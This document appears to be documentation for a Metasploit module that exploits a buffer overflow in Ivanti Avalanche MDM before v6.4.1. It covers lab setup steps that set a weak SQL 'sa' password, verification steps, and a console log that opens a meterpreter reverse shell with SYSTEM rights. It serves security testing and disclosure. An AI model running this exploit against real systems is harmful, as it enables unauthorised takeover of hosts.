Ege Balcı
4.4 KiB
Vulnerable Application
Ivanti Avalanche powered by Wavelink is a mobile device management system. Network security features allow you to manage wireless settings (including encryption and authentication), and apply those settings on a schedule throughout the network. Software distribution features allow you to schedule software distribution to specific devices from the Avalanche Console. Avalanche also provides tools for managing alerts and reports.
This module exploits a buffer overflow condition in Ivanti Avalanche MDM versions before v6.4.1.
An attacker can send a specially crafted message to the Wavelink Avalanche Manager,
which could result in arbitrary code execution with the NT/AUTHORITY SYSTEM permissions.
This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types.
The program tries to copy the item data using qmemcopy to a fixed size data buffer on stack.
Upon successful exploitation the attacker gains full access to the target system.
The original analysis and the vulnerability discovery is done by the Tenable. Check here for public advisory.
Installation
The software requires a version of MSSQL Server to be installed. The installation
instructions use MSSQL Server 2012, but 2016 and 2017 worked for my setup. Ensure that
SQL Server and Windows Authentication Mode is selected as the default for
server authentication. This can either be done at installation or via
SQL Server Management Studio, available from https://learn.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms.
- Open SQL Server Management Studio and connect to the instance
- Right click on the instance and select
Properties - Click the
Securitypage - Underneath
Server Authentication, selectSQL Server and Windows Authentication ModeandOk. - Open SQL Server Configuration Manager -> SQL Server Network Configuration -> Protocols for MSSQLSERVER -> TCP/IP Change from Disable to Enabled.
- SQL Server Configuration Manager -> SQL Server Services -> Stop all Services -> Start just the SQL Server (MSSQLSERVER) service.
- Go back to SQL Server Management Studio.
- Security -> Logins -> sa -> Right click -> Select Properties -> Status -> Toggle Login to Enabled -> Ok
- Execute the following SQL statement in SQL Server Management Studio:
ALTER LOGIN sa WITH PASSWORD = 'theSAUser123'; - You should now be able to run the installer and set the hostname to
127.0.0.1, set the username tosa, and the password totheSAUser123. - Now you can proceed to installing the Ivanti Avalanche MDM software.
For installing the vulnerable Ivanti Avalanche MDM version follow the steps below,
- To obtain the vulnerable versions of the MDM setup, first create a customer account at Ivanti (trial license is sufficient)
- Navigate here
and download any version below
v6.4.1 - Follow the installation steps.
After these steps, the MDM service should be accessible on port 1777. Note: If MDM port is not listening or unresponsive, try restarting the 'Wavelink Avalanche Manager' service.
In case the above doesn't work, instructions for installing Ivanti Avalanche can be found here
Verification Steps
- msfconsole
- Do:
use exploit/windows/misc/ivanti_avalanche_mdm_bof - Do:
set RHOST [IP] - Do:
run - You should get a session.
Options
Scenarios
msf6 > use exploit/windows/misc/ivanti_avalanche_mdm_bof
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/ivanti_avalanche_mdm_bof) > set rhosts 192.168.56.109
rhosts => 192.168.56.109
msf6 exploit(windows/misc/ivanti_avalanche_mdm_bof) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(windows/misc/ivanti_avalanche_mdm_bof) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.109:1777 - Connecting to target...
[*] 192.168.56.109:1777 - Sending payload...
[*] Sending stage (175686 bytes) to 192.168.56.109
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.109:49967) at 2023-08-25 19:15:42 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >